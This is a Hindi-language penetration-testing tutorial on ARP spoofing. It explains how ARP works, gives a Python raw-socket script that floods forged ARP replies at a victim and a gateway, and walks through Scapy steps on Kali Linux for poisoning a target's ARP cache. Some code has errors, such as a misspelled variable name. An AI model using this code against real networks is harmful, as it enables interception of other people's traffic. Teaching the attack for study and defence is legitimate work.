पायथन पेनेट्रेशन टेस्टिंग - एआरपी स्पूफिंग

ARP को एक स्टेटलेस प्रोटोकॉल के रूप में परिभाषित किया जा सकता है, जिसका उपयोग इंटरनेट प्रोटोकॉल (IP) पते को भौतिक मशीन के पते पर मैप करने के लिए किया जाता है।

एआरपी का कार्य करना

इस खंड में, हम एआरपी के काम के बारे में जानेंगे। ARP कैसे काम करता है यह समझने के लिए निम्नलिखित चरणों पर विचार करें -

  • Step 1 - पहला, जब एक मशीन दूसरे के साथ संवाद करना चाहती है तो उसे भौतिक पते के लिए अपनी एआरपी तालिका तक देखना होगा।

  • Step 2 - अगर यह मशीन का भौतिक पता पाता है, तो पैकेट को उसकी सही लंबाई में परिवर्तित करने के बाद, वांछित मशीन को भेजा जाएगा

  • Step 3 - लेकिन अगर तालिका में आईपी पते के लिए कोई प्रविष्टि नहीं मिली है, तो ARP_request नेटवर्क पर प्रसारित किया जाएगा।

  • Step 4- अब, नेटवर्क की सभी मशीनें ब्रॉडकास्ट किए गए आईपी एड्रेस की तुलना मैक एड्रेस से करेंगी और अगर नेटवर्क की कोई भी मशीन एड्रेस की पहचान करती है, तो वह अपने आईपी और मैक एड्रेस के साथ ARP_request पर प्रतिक्रिया देगा। ऐसे ARP संदेश को ARP_reply कहा जाता है।

  • Step 5 - अंत में, अनुरोध भेजने वाली मशीन अपने ARP तालिका में पता जोड़ी को संग्रहीत करेगी और संपूर्ण संचार होगा।

एआरपी स्पूफिंग क्या है?

इसे एक प्रकार के हमले के रूप में परिभाषित किया जा सकता है जहां एक दुर्भावनापूर्ण अभिनेता स्थानीय क्षेत्र नेटवर्क पर जाली एआरपी अनुरोध भेज रहा है। ARP Poisoning को ARP Spoofing के नाम से भी जाना जाता है। इसे निम्नलिखित बिंदुओं की सहायता से समझा जा सकता है -

  • पहला ARP स्पूफिंग, स्विच को ओवरलोड करने के लिए, भारी संख्या में गलत ARP अनुरोध और उत्तर पैकेट का निर्माण करेगा।

  • फिर स्विच को फ़ॉरवर्डिंग मोड में सेट किया जाएगा।

  • अब, एआरपी तालिका खराब एआरपी प्रतिक्रियाओं से भर जाएगी, ताकि हमलावर सभी नेटवर्क पैकेटों को सूँघ सकें।

पायथन का उपयोग करके कार्यान्वयन

इस खंड में, हम एआरपी स्पूफिंग के पायथन कार्यान्वयन को समझेंगे। इसके लिए हमें तीन मैक पते चाहिए - पहला पीड़ित का, दूसरा हमलावर का और तीसरा गेटवे का। इसके साथ ही, हमें ARP प्रोटोकॉल के कोड का भी उपयोग करना होगा।

आइए हम निम्न आवश्यक मॉड्यूलों को आयात करें -

import socket
import struct
import binascii

अब, हम एक सॉकेट बनाएंगे, जिसमें तीन पैरामीटर होंगे। पहला पैरामीटर हमें पैकेट इंटरफ़ेस (लिनक्स विशिष्ट और विंडोज़ के लिए AF_INET के लिए PF_PACKET) के बारे में बताता है, दूसरा पैरामीटर हमें बताता है कि क्या यह एक कच्चा सॉकेट है और तीसरा पैरामीटर हमें उस प्रोटोकॉल के बारे में बताता है जिसमें हम रुचि रखते हैं (यहां 0200800 आईपी के लिए उपयोग किया जाता है) मसविदा बनाना)।

s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket. htons(0x0800))
s.bind(("eth0",socket.htons(0x0800)))

अब हम हमलावर, पीड़ित और गेटवे मशीन का मैक पता प्रदान करेंगे -

attckrmac = '\x00\x0c\x29\x4f\x8e\x76'
victimmac ='\x00\x0C\x29\x2E\x84\x5A'
gatewaymac = '\x00\x50\x56\xC0\x00\x28'

हमें एआरपी प्रोटोकॉल का कोड देने की आवश्यकता है -

code ='\x08\x06'

दो ईथरनेट पैकेट, एक पीड़ित मशीन के लिए और दूसरा गेटवे मशीन के लिए निम्नानुसार तैयार किया गया है -

ethernet1 = victimmac + attckmac + code
ethernet2 = gatewaymac +  attckmac + code

ARP हेडर के अनुसार कोड की निम्नलिखित पंक्तियाँ क्रम में हैं -

htype = '\x00\x01'
protype = '\x08\x00'
hsize = '\x06'
psize = '\x04'
opcode = '\x00\x02'

अब हमें गेटवे मशीन और पीड़ित मशीनों के आईपी पते देने की आवश्यकता है (मान लें कि हमारे पास गेटवे और पीड़ित मशीनों के लिए निम्नलिखित आईपी पते हैं -)

gateway_ip = '192.168.43.85'
victim_ip = '192.168.43.131'

उपरोक्त IP पतों को हेक्साडेसिमल फॉर्मेट की मदद से कन्वर्ट करें socket.inet_aton() तरीका।

gatewayip = socket.inet_aton ( gateway_ip )
victimip = socket.inet_aton ( victim_ip )

गेटवे मशीन के आईपी पते को बदलने के लिए कोड की निम्नलिखित पंक्ति निष्पादित करें।

victim_ARP = ethernet1 + htype + protype + hsize + psize + opcode + attckmac + gatewayip + victimmac + victimip
gateway_ARP = ethernet2 + htype + protype + hsize + psize +opcode + attckmac + victimip + gatewaymac + gatewayip

while 1:
   s.send(victim_ARP)
   s.send(gateway_ARP)

काली लिनक्स पर स्केपी का उपयोग करके कार्यान्वयन

ARP स्पूफिंग को Kali Linux पर Scapy का उपयोग करके लागू किया जा सकता है। ऐसा करने के लिए इन चरणों का पालन करें -

चरण 1: हमलावर मशीन का पता

इस चरण में, हम कमांड चलाकर हमलावर मशीन का आईपी पता प्राप्त करेंगे ifconfig काली लिनक्स के कमांड प्रॉम्प्ट पर।

चरण 2: लक्ष्य मशीन का पता

इस चरण में, हम कमांड चलाकर लक्ष्य मशीन का आईपी पता प्राप्त करेंगे ifconfig काली लिनक्स के कमांड प्रॉम्प्ट पर, जिसे हमें किसी अन्य वर्चुअल मशीन पर खोलने की आवश्यकता है।

चरण 3: लक्ष्य मशीन को पिंग करें

इस चरण में, हमें निम्न आदेश की मदद से हमलावर मशीन से लक्ष्य मशीन को पिंग करने की आवश्यकता है -

Ping –c 192.168.43.85(say IP address of target machine)

चरण 4: लक्ष्य मशीन पर ARP कैश

हम पहले से ही जानते हैं कि दो मशीन मैक पते का आदान-प्रदान करने के लिए एआरपी पैकेट का उपयोग करते हैं इसलिए चरण 3 के बाद, हम एआरपी कैश को देखने के लिए लक्ष्य मशीन पर निम्न कमांड चला सकते हैं -

arp -n

चरण 5: स्कैपी का उपयोग करके एआरपी पैकेट का निर्माण

हम स्कैपी की मदद से एआरपी पैकेट बना सकते हैं -

scapy
arp_packt = ARP()
arp_packt.display()

चरण 6: स्कैपी का उपयोग करके दुर्भावनापूर्ण एआरपी पैकेट भेजना

हम स्कैपी की मदद से दुर्भावनापूर्ण एआरपी पैकेट भेज सकते हैं -

arp_packt.pdst = “192.168.43.85”(say IP address of target machine)
arp_packt.hwsrc = “11:11:11:11:11:11”
arp_packt.psrc = ”1.1.1.1”
arp_packt.hwdst = “ff:ff:ff:ff:ff:ff”
send(arp_packt)

Step 7: Again check ARP cache on target machine

अब अगर हम फिर से ARP कैश को लक्ष्य मशीन पर जाँचेंगे तो हमें नकली पता '1.1.1.1' दिखाई देगा।